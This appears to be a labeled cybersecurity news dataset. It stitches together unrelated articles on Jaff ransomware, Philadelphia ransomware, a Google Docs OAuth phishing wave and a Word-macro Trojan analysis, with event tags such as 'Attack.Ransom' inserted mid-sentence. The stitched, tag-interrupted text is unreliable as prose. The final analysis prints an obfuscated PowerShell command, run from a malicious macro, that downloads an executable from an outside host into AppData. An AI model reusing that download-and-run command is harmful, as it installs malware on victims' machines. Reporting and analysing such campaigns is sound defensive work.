Infamous Necurs botnet seen sending Attack.Phishing spam emails containing new ransomware to millions of potential victims in just a few hours . A new form of ransomware is indiscriminately targeting millions of PCs , spread by the prolific botnet behind one of the most successful forms of ransomware in the world . The new ransomware is called Jaff and given that it appears to be heavily mimicking tactics of the infamous Locky - the most successful ransomware family of 2016 - it has the potential to become a major nuisance . It 's also brazen in its ransom demands Attack.Ransom , demanding Attack.Ransom victims pay Attack.Ransom 1.79 Bitcoins - currently $ 3,300 - in order to regain access to the infected network and encrypted files . It 's an ambitious ransom Attack.Ransom - most forms of ransomware want a payment Attack.Ransom of between $ 500 and $ 1000 - but the authors are likely to be aware that many organisations are willing to give in and pay Attack.Ransom to avoid losing business-critical files . As noted by cybersecurity researchers at Forcepoint , the Jaff campaign Attack.Ransom sprung to life on May 11 , using the Necurs botnet to send Attack.Phishing millions of spam emails emails Attack.Phishing to targets across the globe in the space of just a few hours . The malicious email itself is sent Attack.Phishing with a subject line referring to a receipt or to a fake document , with the pattern involving the words PDF , Scan , File , Copy or Document followed by an underscore and a string of at least four numbers - four example , one subject line seen by researchers was 'Copy _293636 ' Attached to this email is a PDF document containing an embedded DOCM file and a malicious Macro script . If this is run , the ransomware payload is executed and Jaff targets and encrypts a wide variety of file extensions , renaming them all to end in .jaff . While the attack might seem basic - especially compared with targeted spear-phising attacks Attack.Phishing - the sheer number of messages sent out Attack.Phishing means that even just a tiny percentage of targets open the email , download the attachment and enable the macros , this new ransomware could have a sizeable impact . As with other ransomware attacks Attack.Ransom , the infected victim sees their desktop changed to a ransom note and they 're directed to instructions , telling them their files are encrypted and that they must visit a dark web address in order to pay Attack.Ransom to get their files back . It 's this combined with how the ransomware is spread by Necurs - which leads researchers to suggest that there 's a connection between Jaff and Locky : the Jaff decryptor website and the Locky decryptor website look almost identical . Researchers also note that while the code behind Jaff is less sophisticated than Locky , it carries one major similarity - the ransomware will delete itself from the infected machine if the local language is Russian . If the ransomware does not want to target Russian users this might suggest it originate from Russia and the developers do n't want to cause trouble in their own neighbourhood . While researchers ca n't say for certain if Jaff is definitively linked to the gang behind Locky but those behind it have the funding and skills required to carry out a sophisticated campaign . `` What is clear , given the volume of messages sent , is that the actors behind the campaign have expended significant resources on making such a grand entrance , '' said Forcepoint researchers .

Forcepoint security labs has identified a form of ransomware , first documented back in September 2016 that targets healthcare organisations . ‘ Philadelphia ’ , believed to be a new version of ‘ Stampedo ’ currently shows patterns that could be the beginning of a widening targeting campaign , extending beyond US perimeters . Sold for just a few hundred dollars and promoted on YouTube , it gives have-a-go criminals , on a global scale , the tools to conduct very targeted and convincing attacks . The attack Attack.Phishing is sent Attack.Phishing through a spear-phishing email containing tailored logos and staff names , adding to the deception . Once activated the variant communicates information including operating system , username , country and system code back to its command and control and generates a victim ID , bitcoin wallet ID and bitcoin ransom price . Carl Leonard , principal security analyst at Forcepoint , said : “ While processing our open source intelligence feeds we discovered Philadelphia , currently a cheap , poorly written ransomware that is available cheaply to script kiddies . Although the ransom Attack.Ransom is currently only 0.3 BTC , the command and control paths suggest that the actor is targeting hospitals for this campaign so there are likely to be other targets

Google said it has disabled offending accounts involved in a widespread spree of phishing emails today impersonating Attack.Phishing Google Docs . The emails , at the outset , targeted journalists primarily and attempted to trick Attack.Phishing victims into granting the malicious application permission to access the user ’ s Google account . It ’ s unknown how many accounts were compromised Attack.Databreach , or whether other applications are also involved . Google advises caution in clicking on links in emails sharing Google Docs . The messages purport to be from Attack.Phishing a contact , including contacts known to the victim , wanting to share a Google Doc file . Once the “ Open in Docs ” button is clicked , the victim is redirected to Google ’ s OAUTH2 service and the user is prompted to allow the attacker ’ s malicious application , called “ Google Docs , ” below , to access their Google account and related services , including contacts , Gmail , Docs and more . “ We have taken action to protect users against an email impersonating Attack.Phishing Google Docs , and have disabled offending accounts , ” a Google spokesperson told Threatpost . “ We ’ ve removed the fake pages , pushed Vulnerability-related.PatchVulnerability updates through Safe Browsing , and our abuse team is working to prevent this kind of spoofing Attack.Phishing from happening again . We encourage users to report phishing emails in Gmail. ” OAUTH is an authentication standard that allows a user to authorize third party applications access to an account . The attempt to steal OAUTH tokens is a departure from traditional phishing attacks Attack.Phishing that target passwords primarily . Once the attacker has access Attack.Databreach to the victim ’ s account , the phishing message is sent Attack.Phishing along to the compromised contact list . While this attack is likely the work of a spammer , nation-state attackers including APT28 , aka Fancy Bear or Sofacy , have made use of this tactic . APT28 has been linked to last summer’s attacks Attack.Phishing attempting to influence the U.S. presidential elections . The group has long been targeting political entities , including NATO , and uses phishing emails , backdoors and data-stealing malware to conduct espionage campaigns against its targets . “ I don ’ t believe they are behind this though because this is way too widespread , ” said Jaime Blasco , chief scientist at AlienVault . “ Many people and organizations have received similar attempts , so this is probably something massive and less targeted . ”

Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaks Attack.Databreach concerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attack Attack.Phishing , via phishing Attack.Phishing , was highly advanced and combined social engineering tactics with a powerful Trojan . The attack Attack.Phishing is sent Attack.Phishing by email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming from Attack.Phishing a healthcare company . The text tricks Attack.Phishing the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to steal Attack.Databreach credentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight